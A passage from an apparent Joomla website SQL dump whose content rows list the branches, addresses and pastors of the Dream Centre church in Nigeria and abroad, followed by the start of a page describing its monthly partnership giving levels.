'{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 2, '', '', 1, 207, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(121, 347, 'Branches', 'branches', '<h2><strong>To contact any of our pastors please call: 09090003891</strong></h2>\r\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\">S/N</td>\r\n<td valign=\"top\">\r\n<p><strong>DREAM CENTRE&nbsp;HEADQUARTERS</strong></p>\r\n<p><strong>Km. 4 Gbongan-Osogbo Express Way,&nbsp;Dream Center Bustop, Osogbo, Nigeria.</strong></p>\r\n</td>\r\n<td valign=\"top\"><strong>PASTOR IN CHARGE</strong></td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;1</td>\r\n<td valign=\"top\">Married Men Church</td>\r\n<td valign=\"top\">Pastor Dayo Afolabi</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;2</td>\r\n<td valign=\"top\">Married Women Church</td>\r\n<td valign=\"top\">Pastor Dr. Ife Omonijo &amp; Pastor Tunde Olajolo</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;3</td>\r\n<td valign=\"top\">Single Brother Workers Church</td>\r\n<td valign=\"top\">Pastor Samuel Olalere</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;4</td>\r\n<td valign=\"top\">Single Brother Student Church</td>\r\n<td valign=\"top\">Pastor Cleopas Ibikunle</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;5</td>\r\n<td valign=\"top\">Single Sister Workers Church</td>\r\n<td valign=\"top\">Pastor Niyi Kuye&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;6&nbsp;</td>\r\n<td valign=\"top\">Single Sister Student Church</td>\r\n<td valign=\"top\">Sis. Victoria&nbsp;Adebiyi</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;7&nbsp;</td>\r\n<td valign=\"top\">Teenagers Church</td>\r\n<td valign=\"top\">Pastor&nbsp;Adebiyi Mathew</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\"><strong>&nbsp;</strong></td>\r\n<td valign=\"top\"><strong>SATELLITE BRANCHES IN OSOGBO</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre Opposite St. Charles High School, Tanimomo Estate, Ilesa Road, Osogbo.</td>\r\n<td valign=\"top\">Pastor Ayodeji Ogungbemi</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2</td>\r\n<td valign=\"top\">The Dream Centre Okunola Shopping Complex, Beside Capital Hotel, Dada Estate, Osogbo.</td>\r\n<td valign=\"top\">Pastor&nbsp;Tunji Adedokun</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">3</td>\r\n<td valign=\"top\">DEEGOF&nbsp;Complex, Klm 7, New Ikirun Rd, Beside NIPCO Filling Station, Opp. Ota-Efun Motor Park.</td>\r\n<td valign=\"top\">Pastor OJO, Olukunle David.&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">4</td>\r\n<td valign=\"top\">Opposite IBRO Decorations, Ilobu Road, Agunbelewo.</td>\r\n<td valign=\"top\">Pastor&nbsp;Sunday Israel</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">5</td>\r\n<td valign=\"top\">The Dream Centre, Staff C.I.C.S Building, Osogbo local Govt. Secretariat, Oke Baale, Osogbo</td>\r\n<td valign=\"top\">Dr Tunde Beyioku</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">6</td>\r\n<td valign=\"top\">The Dream Centre, Room 5, Block 4, Baptist Primary School, Beside Egbedore Local Government Secretariat Awo.</td>\r\n<td valign=\"top\">Deacon Dr. Tunde Ayankola</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">7</td>\r\n<td valign=\"top\">The Dream Centre, Opposite Unique International Market, along Owode – Ede Road, Owode.</td>\r\n<td valign=\"top\">Pastor Tope Aduramo</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">8</td>\r\n<td valign=\"top\">Mojirola Plaza, PRIME Area, Ofatedo.</td>\r\n<td valign=\"top\">&nbsp;Mr. Jacob Olagunju</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">ile&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>LAGOS STATE</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, No 1, Oluwadare Street, Fola Agoro, Shomolu Lagos</td>\r\n<td valign=\"top\">Mr. Joseph Shaibu</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2</td>\r\n<td valign=\"top\">The Dream Centre, 10, Segun Irefin Street, Off LASU- Isheri road, by old Garage Bus Stop. Isheri - Idimu</td>\r\n<td valign=\"top\">Pastor Seyi Oluwatuyi&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">3</td>\r\n<td valign=\"top\">The Dream Centre, 1, Okota road by Cele Express Bus stop, Apapa – Oshodi Expressway Okota, Isolo</td>\r\n<td valign=\"top\">Pastor. Seun Ojo</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">4</td>\r\n<td valign=\"top\">The Dream Centre, 2nd floor, 35 Benson Bus Stop, Opposite Fidelity Bank, Lagos- Ikorodu Road, Ikorodu</td>\r\n<td valign=\"top\">Pastor&nbsp;Toba Abe</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">5</td>\r\n<td valign=\"top\">The Dream Centre, New page Plaza, No 25 Kosoko Road, Ojodu Berger</td>\r\n<td valign=\"top\">Bro. Dosu George</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">6</td>\r\n<td valign=\"top\">The Dream Centre,&nbsp; 154, Obafemi Awolowo way, Allen Junction Bus Stop Ikeja</td>\r\n<td valign=\"top\">Pastor Biodun Adegbite</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">7</td>\r\n<td valign=\"top\">The Dream Centre, Suite 60, 2nd floor, OlorunFfunmi Plaza, Opposite UAC foods, 398 Ikorodu road, Ojota</td>\r\n<td valign=\"top\">Pastor Dayo Alagbe</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">8</td>\r\n<td valign=\"top\">The Dream Centre, LG Shopping Complex, 63, Lawanson road, Zamba bus Stop, Itire, &nbsp;Surulere</td>\r\n<td valign=\"top\">Pastor&nbsp;Kayode Olorunisola</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">9</td>\r\n<td valign=\"top\">&nbsp;No 1, Kehinde Eta-Oko Street, Ijegun-Egba, Satellite Town.</td>\r\n<td valign=\"top\">Pastor Dr. Niyi Bankole</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>OTA</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">SOVS PLAZA, 17 Badore Rd. By Adewale Oshin B/Stop, Off Lekki-Epe Expressway, Ajah.&nbsp;</td>\r\n<td valign=\"top\">&nbsp;Pastor Michael Ademolu</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>AKURE</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Adjacent Bayduk Filling Station, Alejolowo Area, Along Akure-Ilesa Expressway, Akure.</td>\r\n<td valign=\"top\">Pastor Lekan Ojo</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2</td>\r\n<td valign=\"top\">The Dream Centre, 16 Oluwatuyi Quarters (Former Maestro Club), Akure.</td>\r\n<td valign=\"top\">Pastor Dr. Christopher Akinbile</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">3</td>\r\n<td valign=\"top\">The Dream Centre, Opposite Fiwasaye Grammar School, Alagbaka, Akure.</td>\r\n<td valign=\"top\">Pastor Lekan Ojo</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;4</td>\r\n<td valign=\"top\">The Dream Centre, 2nd Floor, Old Custom Building, Ajipowo Junction, Along Ondo Road, Akure</td>\r\n<td valign=\"top\">&nbsp;Pastor Femi Sarumi</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>BENIN</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">Please call</td>\r\n<td valign=\"top\">&nbsp;Mr. Niyi Olaiya</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>OWO</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Former PHCN Building, Opposite Onireke Hotel, Okeogun, Owo, Ondo State</td>\r\n<td valign=\"top\">Pastor Dr Anthony Olasinde</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>IBADAN</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Victoria’s Place Shopping Complex, Opposite Conoil Petrol Station, U.I Bodija Ibadan</td>\r\n<td valign=\"top\">Pastor Niyi Akindoyin</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2</td>\r\n<td valign=\"top\">The Dream Centre, LATMOR Building, Top Floor, 993, Abeokuta Road, Beside New Garage, Apata, Ibadan</td>\r\n<td valign=\"top\">Pastor&nbsp;Enitan&nbsp;Egbeyemi.</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">3</td>\r\n<td valign=\"top\">The Dream Centre,&nbsp; Faith Complex, Opposite Carlton Gate Estate, General Gas/Iyana Church Road Akobo, Ibadan</td>\r\n<td valign=\"top\">Pastor Dr. Ademola Adekanmi.</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>OGBOMOSO</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, 2nd Floor, Oluwusi Building, Beside Alata Supermarket, Ogbomoso</td>\r\n<td valign=\"top\">Pastor Dr. Tope Binuomote</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>ABEOKUTA</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Imran Taiwo Rock View Plaza, Opposite Lipede Ultra Modern Market, Kuto Road&nbsp; Abeokuta</td>\r\n<td valign=\"top\">Pastor Rufus Oyedele</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>FCT, ABUJA</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Suite 006, Aphro Plaza, Gwagwalada, Behind UNIABUJA Mini Campus, Along Boys Hostel Road, Abuja.</td>\r\n<td valign=\"top\">Pastor Dr. Tunde Ogunkoya</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2</td>\r\n<td valign=\"top\">Legion House, No. 9 Kaura Namoda Street Area 3, Garki</td>\r\n<td valign=\"top\">Mr. Demola Akintunde</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>PORT-HARCOURT</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, 1st Floor, Plot 160, East-West Road, Adjacent Brain Field Secondary School, Between Rumuokoro Roundabout &amp; Eliogbolo,&nbsp; Port-Harcourt.</td>\r\n<td valign=\"top\">Pastor Wale Olansebe</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>ILORIN</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Beside Alabukun Bus Stop, Ita-Alamu, Ilorin.</td>\r\n<td valign=\"top\">Pastor&nbsp;Musa Adeola</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2</td>\r\n<td valign=\"top\">The Dream Centre, opposite Tosfol Event Centre, beside Eucharistic Model College, Asa Dam road, Off Offa garage roundabout, Ilorin</td>\r\n<td valign=\"top\">&nbsp;Pastor Dr. Tomiwa Akintunde</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>OFFA</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Beside Oduwoye Filling Station, Tipper Garage, Offa.</td>\r\n<td valign=\"top\">&nbsp;Mr. Babarinde</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>ILE-IFE</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Behind AP Filling Station, Oronna, Modakeke - Ife</td>\r\n<td valign=\"top\">Pastor Soji Oloyede</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2</td>\r\n<td valign=\"top\">The Dream Centre, Opposite Olurogbo High School, Hezekiah Oluwasanmi road (Road 7), Ile-Ife</td>\r\n<td valign=\"top\">Pastor Niyi Adenuga</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">3</td>\r\n<td valign=\"top\">2nd Floor, His Mercy Hospital Building, Phase One Bus Stop, OAUTHC, Ile-Ife.</td>\r\n<td valign=\"top\">Pastor Dayo Amusan</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>ILE-OLUJI</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">The Squash Arena, Ile-Oluji Recreation Centre.</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>OSU</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">All For God Villa, Opposite Atakumosa West Local Govt. Secretariat, Osu</td>\r\n<td valign=\"top\">&nbsp;Dr Soji Onabanjo</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>ILESHA</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Opposite Sawmill Alfa, Concord, Ilesha.</td>\r\n<td valign=\"top\">Pastor Gbenga Abe</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2</td>\r\n<td valign=\"top\">The Dream Centre, Beside The Police Station, Opposite The Prisons, Ayeso, Ilesa.</td>\r\n<td valign=\"top\">Pastor&nbsp;Sunday Israel</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">3</td>\r\n<td valign=\"top\">&nbsp;The Dream Centre, Bolorunduro, Ilesa</td>\r\n<td valign=\"top\">Pastor Seun Kolapo</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">4</td>\r\n<td valign=\"top\">A197 Isokun Street.</td>\r\n<td valign=\"top\">Pastor Joel Akinkunmi</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>IKIRUN</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Plot 14, Ifelodun L.G.A offa Ikirun Expressway Besides Okanlawon Filling Station Ikirun</td>\r\n<td valign=\"top\">Pastor&nbsp;Micheal Olabode</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">2.</td>\r\n<td valign=\"top\">Oluwabukunmi Complex, Adjacent Eko-einde Garage, Inisa Car Park, Beside St. Paul Primary School.</td>\r\n<td valign=\"top\">&nbsp;Mr. Kehinde Adewuyi</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>EDE</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1.</td>\r\n<td valign=\"top\">Lord\'s Glory Oil, Awo Road, Oke Gada, Ede.</td>\r\n<td valign=\"top\">&nbsp;Mr. Yemi Oyelade</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>ILA ORANGUN</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">Old Taste Meal Building, Sharp Corner Area, Along OSSCE.</td>\r\n<td valign=\"top\">&nbsp;Mr. Yemi Obiremi</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>EJIGBO</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre, Cooperative Building, Opposite Police Station, Along Iwo Road, Karowosaye, Ejigbo.</td>\r\n<td valign=\"top\">Pastor Dr Funmi Oloyede</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>LONDON, UK</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre,&nbsp;London. Please Call:]&nbsp;&nbsp;+44-7508-782839</td>\r\n<td valign=\"top\">Pastor&nbsp;Sogo&nbsp;Adediran</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>ONLINE CHURCH</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">1</td>\r\n<td valign=\"top\">The Dream Centre,&nbsp; Online Church</td>\r\n<td valign=\"top\">Pastor&nbsp;Kehinde&nbsp;Odeniyi</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>USA</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">The Dream Centre, USA</td>\r\n<td valign=\"top\">Please call this no</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\"><strong>TRAVELLING MINISTERS</strong></td>\r\n<td valign=\"top\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">Travelling Minister</td>\r\n<td valign=\"top\">Pastor Dayo Owoeye</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">Travelling Minister</td>\r\n<td valign=\"top\">Pastor&nbsp;Charles Abiona</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">Travelling Minister</td>\r\n<td valign=\"top\">Pastor&nbsp;Samuel Binuomote</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">Travelling Minister,</td>\r\n<td valign=\"top\">Pastor Seun Kolapo</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\">&nbsp;</td>\r\n<td valign=\"top\">Travelling Minister</td>\r\n<td valign=\"top\">Pastor Biodun Akinyemi</td>\r\n</tr>\r\n</tbody>\r\n</table>', '', 1, 37, '2017-01-01 08:32:08', 196, '', '2019-06-12 16:20:34', 196, 0, '0000-00-00 00:00:00', '2017-01-01 08:32:08', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 47, 1, '', '', 1, 14532, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(122, 350, 'Partnership', 'partnership', '<p><strong>Partnership</strong> with the Dream Centre involves a covenant connection. It is a commitment to support Living Jesus Ministries in fulfilling God-given vision of helping men realise their God-given dreams in life by spreading the Gospel worldwide. Every soul that is saved and life that is changed through LJM is credited to the heavenly accounts of our Vision Partners.</p>\r\n<p class=\"notice\"><strong>Who is a Partner?</strong></p>\r\n<p>A Vision Partner of Living Jesus Ministries is “someone who is committed to this ministry and its vision.” Partnership is “the relationship between people who support one another in the achievement of a common goal.”</p>\r\n<p>By no means is partnership just an avenue through which to raise finances. Instead, it involves a mutual exchange of faithfulness. Rev. Olusola A. Areogun and Rev. (Mrs) Oyenike Areogun faithfully and actively pray on behalf of our Vision Partners daily. They declare the blessing—the empowerment to prosper and excel—on our Vision Partners. Vision Partners of this ministry have a right to connect to the anointing that is on this ministry so that they, too, can prosper spiritually, socially, mentally, physically, emotionally and financially.</p>\r\n<p class=\"notice\"><strong>Partnership in LOIC</strong></p>\r\n<p><strong>1.    PARTNERSHIP ON THE SIX LEVELS:</strong></p>\r\n<hr />\r\n<p>The following are the levels of partnership available in the Dream Centre:</p>\r\n<ul>\r\n<li><strong>INTERNET SUBSCRIPTION SEED (N1,000 per month):</strong> This is the seed we sow towards the maintenance of the Internet ministry of the church. This is what makes it possible for people to watch Live Streaming on Wednesdays, Sundays and during all our special services.</li>\r\n<li>E<strong>AGLE CLUB (N2,500 per month):</strong> This is the seed that we sow towards the preaching of the gospel on the local radio stations like FRCN, Metro FM, Harmony FM, Unique FM, etc. several people have been saved and delivered through the ministry of the word from the Dream Centre altar. You tap into accelerated harvest sowing into this seed and other covenant words of wealth in the church.</li>\r\n<li><strong>SPIRIT MEAT (N5,000 per month):</strong> Some 28,000 copies of the Spirit Meat daily devotional are distributed freely throughout 